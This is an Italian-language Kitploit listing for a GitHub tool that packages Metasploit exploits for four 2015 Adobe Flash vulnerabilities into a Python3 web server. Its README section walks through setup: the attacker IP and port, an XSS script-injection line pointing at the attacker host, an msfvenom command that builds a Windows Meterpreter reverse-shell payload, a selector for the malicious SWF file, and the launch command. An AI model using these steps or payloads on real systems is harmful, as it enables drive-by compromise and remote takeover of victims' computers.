Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Adobe-Flash-Exploits_17-18 — Convertiti gli exploit Metasploit per le vulnerabilità Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 e CVE-2015-5122 in uno script Python3 | Kitploit
Strumenti/GitHubGitHub/xattam1/adobe-flash-exploits_17-18
Framework di ExploitGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubxattam1/adobe-flash-exploits_17-18

Adobe-Flash-Exploits_17-18

Convertiti gli exploit Metasploit per le vulnerabilità Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 e CVE-2015-5122 in uno script Python3

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
14 anni faNon ancora revisionato

Adobe Flash Exploits CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 e CVE-2015-5122 Python3 Script

Exploit Metasploit convertiti per le vulnerabilità Adobe Flash CVE-2015-3090, CVE-2015-3105, CVE-2015-5119 e CVE-2015-5122 in uno script Python3.

Informazioni

Questo script ospiterà un server web in grado di sfruttare una delle seguenti vulnerabilità Adobe Flash alla volta:

  1. CVE-2015-3090
  2. CVE-2015-3105
  3. CVE-2015-5119
  4. CVE-2015-5122

Esecuzione

Devi apportare modifiche (descritte qui) a exploit.py per adattarlo alle tue esigenze.

Modifiche

  • hostname = "192.168.1.100"
    • Questo è un indirizzo IP del sistema attaccante che ospiterà il server web dell'exploit.
  • serverPort = 8080
    • Questa è la porta del sistema attaccante che ospiterà il server web dell'exploit.
  • xss = False
    • Se impostato su True, la prima richiesta della vittima al server viene trattata come JavaScript:
      • Esempio di iniezione XSS:
        • <script src="http://192.168.1.100:8080/"></script>
      • Percorso dell'attacco:
        • Richiesta vittima 1 -> Server vulnerabile a XSS:
          • La vittima accede all'iniezione XSS su un server remoto che richiede un file JavaScript (vedi richiesta 2).
        • Richiesta vittima 2 -> Sorgente JavaScript sul sistema attaccante.
        • Richiesta vittima 3 -> File swf dannoso.
    • Se impostato su False, la prima richiesta della vittima al server viene trattata come HTML:
      • Esempio:
        • http://192.168.1.100:8080/
      • Percorso dell'attacco:
        • Richiesta vittima 1 -> File HTML sul sistema attaccante.
        • Richiesta vittima 2 -> File swf dannoso.
  • base64Payload = "..."
    • Questo è il payload base64 che verrà eseguito sul sistema vittima.
    • Modifica il comando di esempio qui sotto per adattarlo alle tue esigenze e genera il tuo payload:
      • Esempio:
        • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
      • Nota: L'unico payload che ha funzionato per me è windows/meterpreter/reverse_tcp.

  • swfFile = swfFileList['37368']
    • Seleziona il file swf dell'exploit Adobe Flash da utilizzare per sfruttare il sistema vittima:
      • root@kitploit:~
        swfFileList = {
            '37368': 'CVE-2015-3090.swf',
            '37448': 'CVE-2015-3105.swf',
            '37523': 'CVE-2015-5119.swf',
            '37599': 'CVE-2015-5122.swf'
        }
        

Esegui

Esegui il seguente comando, nella stessa directory dei file swf dannosi, per eseguire lo script di exploit Adobe Flash:

  • python3 exploit.py

Riferimenti:

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599

Scarica lo strumento